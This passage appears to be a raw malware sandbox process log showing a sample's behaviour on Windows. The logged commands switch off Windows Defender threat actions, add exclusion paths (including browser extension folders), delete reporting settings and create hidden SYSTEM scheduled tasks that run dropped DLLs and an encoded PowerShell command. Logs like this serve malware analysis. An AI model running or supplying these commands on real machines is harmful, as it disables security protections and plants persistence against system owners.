\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:444
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2888
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1376
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JSvmmaasyifU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JSvmmaasyifU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PsYvahnKTrUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PsYvahnKTrUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XAdqrgEBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XAdqrgEBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fQVUHuJykzJROXvopbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fQVUHuJykzJROXvopbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mTRodfBIfZXIC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mTRodfBIfZXIC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOobGsbFvZLKVmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOobGsbFvZLKVmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FCpAHwyRaDjRyPMK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FCpAHwyRaDjRyPMK\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:1948
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JSvmmaasyifU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5492
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JSvmmaasyifU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JSvmmaasyifU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PsYvahnKTrUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PsYvahnKTrUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XAdqrgEBU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XAdqrgEBU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fQVUHuJykzJROXvopbR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fQVUHuJykzJROXvopbR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mTRodfBIfZXIC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mTRodfBIfZXIC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOobGsbFvZLKVmVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOobGsbFvZLKVmVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FCpAHwyRaDjRyPMK /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FCpAHwyRaDjRyPMK /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3048
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gfOdTJxhb" /SC once /ST 02:24:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5332
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gfOdTJxhb"
  2⤵
  PID:6092
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gfOdTJxhb"
  2⤵
  PID:1880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "nEIDyORqfotFHrFjj" /SC once /ST 03:10:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\FCpAHwyRaDjRyPMK\KNuunPWBMPugBor\aIEJDMP.exe\" fB /bJsite_idfEi 525403 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5960
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "nEIDyORqfotFHrFjj"
  2⤵
  PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5080 -ip 5080
1⤵
PID:5796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2696
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:6052

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5136 -ip 5136
1⤵
PID:6096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5800 -ip 5800
1⤵
PID:5608

C:\Windows\Temp\FCpAHwyRaDjRyPMK\KNuunPWBMPugBor\aIEJDMP.exe
C:\Windows\Temp\FCpAHwyRaDjRyPMK\KNuunPWBMPugBor\aIEJDMP.exe fB /bJsite_idfEi 525403 /S
1⤵
PID:5148
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
  2⤵
  PID:5852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bVVEtlzJxMROejURst"
  2⤵
  PID:5284
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:4636
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:3180
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:5788
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:5416
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XAdqrgEBU\bXmqkF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IiMEJPNSvkLCmYT" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2976
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "IiMEJPNSvkLCmYT2" /F /xml "C:\Program Files (x86)\XAdqrgEBU\gHDHQXf.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5572
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "IiMEJPNSvkLCmYT"
  2⤵
  PID:5540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "IiMEJPNSvkLCmYT"
  2⤵
  PID:1376
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "EBDqAzlINIanDN" /F /xml "C:\Program Files (x86)\JSvmmaasyifU2\kbUQAuv.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5532
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "hAtTRPFuPUtTW2" /F /xml "C:\ProgramData\uOobGsbFvZLKVmVB\dINoKah.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VtFobttFvGJIIJZcR2" /F /xml "C:\Program Files (x86)\fQVUHuJykzJROXvopbR\nsZQgMl.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HYUvCLLSkqCzkDYABLk2" /F /xml "C:\Program Files (x86)\mTRodfBIfZXIC\TVZKRyN.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1576
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GDslENqmQrPagdBhX" /SC once /ST 13:52:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\FCpAHwyRaDjRyPMK\ygEQnZXI\wvHZhBU.dll\",#1 /Avsite_idsMi 525403" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1708
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "GDslENqmQrPagdBhX"
  2⤵
  PID:2844
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:6128
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:4416
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:3436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "nEIDyORqfotFHrFjj"
  2⤵
  PID:4448

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FCpAHwyRaDjRyPMK\ygEQnZXI\wvHZhBU.dll",#1 /Avsite_idsMi 525403
1⤵
PID:4888
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FCpAHwyRaDjRyPMK\ygEQnZXI\wvHZhBU.dll",#1 /Avsite_idsMi 525403
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "GDslENqmQrPagdBhX"
    3⤵
    PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3768 -ip 3768
1⤵
PID:6076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1644 -ip 1644
1⤵
PID:2452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5904 -ip 5904
1⤵
PID:2160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6036 -ip 6036
1⤵
PID:5248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:5576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5492 -ip 5492
1⤵
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5848 -ip 5848
1⤵
PID:4216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6100 -ip 6100
1⤵
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5452 -ip 5452
1⤵
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5928 -ip 5928
1⤵
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5580 -ip 5580
1⤵
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5888 -ip 5888
1⤵
PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5480 -ip 5480
1⤵
PID:3136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2992 -ip 2992
1⤵
PID:2200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5848 -ip 5848
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5732 -ip 5732
1⤵
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3584 -ip 3584
1⤵
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3436 -ip 3436
1⤵
PID:5840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 3696 -ip 3696
1⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1328 -ip 1328
1⤵
PID:2872

